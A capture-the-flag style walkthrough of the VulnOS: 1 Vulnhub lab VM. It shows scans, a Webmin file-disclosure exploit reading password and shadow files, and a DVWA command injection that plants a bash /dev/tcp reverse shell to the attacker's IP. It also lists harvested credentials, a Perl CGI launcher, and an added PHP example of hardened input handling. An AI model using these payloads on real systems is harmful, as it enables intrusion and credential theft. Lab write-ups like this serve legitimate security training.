Monday, October 14, 2019

Vulnhub: VulnOS: 1

source: https://www.vulnhub.com/entry/vulnos-1,60/

192.168.1.105

ubuntu server 10.04 LTS

22/tcp    open  ssh         OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.7.0-P1
80/tcp    open  http        Apache httpd 2.2.14 ((Ubuntu))
110/tcp   open  pop3        Dovecot pop3d
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd
389/tcp   open  ldap        OpenLDAP 2.2.X - 2.3.X
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login
514/tcp   open  tcpwrapped
901/tcp   open  http        Samba SWAT administration server
993/tcp   open  ssl/imaps?
995/tcp   open  ssl/pop3s?
2000/tcp  open  sieve       Dovecot timsieved
2049/tcp  open  nfs         2-4 (RPC #100003)
3306/tcp  open  mysql       MySQL 5.1.73-0ubuntu0.10.04.1
3632/tcp  open  distccd     distccd v1 ((Ubuntu 4.4.3-4ubuntu5.1) 4.4.3)
6667/tcp  open  irc         IRCnet ircd
8070/tcp  open  ucs-isc?
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
38175/tcp open  nlockmgr    1-4 (RPC #100021)
41631/tcp open  mountd      1-3 (RPC #100005)
55692/tcp open  status      1 (RPC #100024)

+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-3268: /imgs/: Directory indexing found.
+ OSVDB-3092: /imgs/: This might be interesting...
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.23
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3093: /.htaccess: Contains configuration and/or authorization information
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie 5d89dac18813e15aa2f75788275e3588 created without the httponly flag
+ /phpldapadmin/: Admin login page/section found.
+ Cookie PPA_ID created without the httponly flag
+ /phppgadmin/: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.

/.htaccess (Status: 200)
/cgi-bin/ (Status: 403)
/imgs (Status: 301)
/index (Status: 200)
/index.html (Status: 200)
/index2 (Status: 200)
/javascript (Status: 301)
/mediawiki (Status: 301)
  mediawiki v1.15.1
/phpldapadmin (Status: 301)
  phpLDAPadmin v1.2.0.5
/phpmyadmin (Status: 301)
  phpmyadmin v3.3.2.0
/phppgadmin (Status: 301)
  phpPgAdmin v4.2.2 (PHP 5.3.2-1ubuntu4.23)
/server-status (Status: 403)
/drupal6 (Status: 301)
  /DVWA-1.0.8
  http://192.168.1.105/DVWA-1.0.8/login.php
    username admin, password password
/egroupware (Status: 301)
  stylite’s egroupware v1.8
/phpgroupware (Status: 301)
  phpGroupWare 1:0.9.16.012+dfsg-10 (Debian)
/phpsysinfo (Status: 301)
  phpsysinfo v3.0.4
  2.6.32-57-generic-pae (SMP) i686


https://www.exploit-db.com/exploits/2017
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)

perl 2017.pl 192.168.1.105 10000 /etc/passwd 0
vulnosadmin:x:1000:1000:vulnosadmin,,,:/home/vulnosadmin:/bin/bash
sysadmin:x:1001:1001::/home/sysadmin:/bin/sh
webmin:x:1002:1002::/home/webmin:/bin/sh
hackme:x:1003:1003::/home/hackme:/bin/sh
sa:x:1004:1004::/home/sa:/bin/sh
stupiduser:x:1005:1005::/home/stupiduser:/bin/sh

perl 2017.pl 192.168.1.105 10000 /etc/shadow 0
vulnosadmin:$6$SLXu95CH$pVAdp447R4MEFKtHrWcDV7WIBuiP2Yp0NJTVPyg37K9U11SFuLena8p.xbnSVJFAeg1WO28ljNAPrlXaghLmo/:16137:0:99999:7:::
sysadmin:admin:16137:0:99999:7:::
webmin:webmin:16137:0:99999:7:::
hackme:hackme:16137:0:99999:7:::
sa:password1:16137:0:99999:7:::
stupiduser:stupiduser:16137:0:99999:7:::

http://192.168.1.105/DVWA-1.0.8/vulnerabilities/exec/
; echo "<?php system(\"/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.90/443 0>&1'\");?>" > /var/www/dolibarr-3.0.0/rs.php

http://192.168.1.105/dolibarr-3.0.0/rs.php
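
The `;` in the input above works because the form's value reaches a shell as part of a command line. Added example (not from the original post and not DVWA's own source) showing that pattern beside a hardened one; the function names and sample inputs are hypothetical, and the handler is assumed to ping the submitted address.

```php
<?php
// Added example: constructed handler modelled on a "ping this host" form.
// Function names and sample inputs are hypothetical, not DVWA's own source.
// Nothing is executed here; both functions only build the command string.

// Vulnerable pattern: user input concatenated into a shell command line.
// A ';' in the input ends the ping command and starts a second command.
function build_ping_vulnerable(string $target): string
{
    return 'ping -c 3 ' . $target;
}

// Hardened pattern: accept only a literal IP address, then quote it anyway.
// Returns null when the input is rejected, so the caller never reaches a shell.
function build_ping_hardened(string $target): ?string
{
    $target = trim($target);
    if (filter_var($target, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    return 'ping -c 3 ' . escapeshellarg($target);
}

// Constructed sample inputs: one valid address, one carrying a second command.
$samples = ['192.168.1.105', '192.168.1.105; echo injected'];

foreach ($samples as $input) {
    $hardened = build_ping_hardened($input);
    printf("input:      %s\n", $input);
    printf("vulnerable: %s\n", build_ping_vulnerable($input));
    printf("hardened:   %s\n\n", $hardened ?? '(rejected, nothing executed)');
}
```

Input validation closes the injection itself; the write into /var/www/dolibarr-3.0.0 additionally depended on the web server account having write access to a directory it serves.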

cp /home/hackme/vulnleaks.pdf.zip /var/www/dolibarr-3.0.0
john vulnleaks.pdf.zip:
password admins

cp /home/sysadmin/user_bankaccounts.ods /var/www/dolibarr-3.0.0
vulnosadmin 125487-9821211-5987 4574 1256000$
root 156987-1458971 9871 569000000$
sa 48726987-89578 7412 450000$
webmin 48741269-5897412 7485 130050$

/var/www/webERP/config.php:
$DBUser = 'root';
$DBPassword = 'toor';

mysql username root, password toor

http://192.168.1.105/dolibarr-3.0.0/htdocs/
username vulnosadmin, password vulnosadmin

http://192.168.1.105/webERP/
username admin, password weberp
username WEB0000017, password weberp

http://192.168.1.105/drupal6/
username drupal6, password drupal6
username webmin, password 

http://192.168.1.105/DVWA-1.0.8/login.php
username admin, password password
username gordonb, password abc123
username 1337, password charley
username pablo, password letmein
username smithy, password password

upload /tmp/rs.php

upload /tmp/1.cgi
#!/usr/bin/perl -w
print "Content-type: text/plain\n\n";
exec "php /tmp/rs.php";

perl ./2017.pl 192.168.1.105 10000 /tmp/1.cgi 0

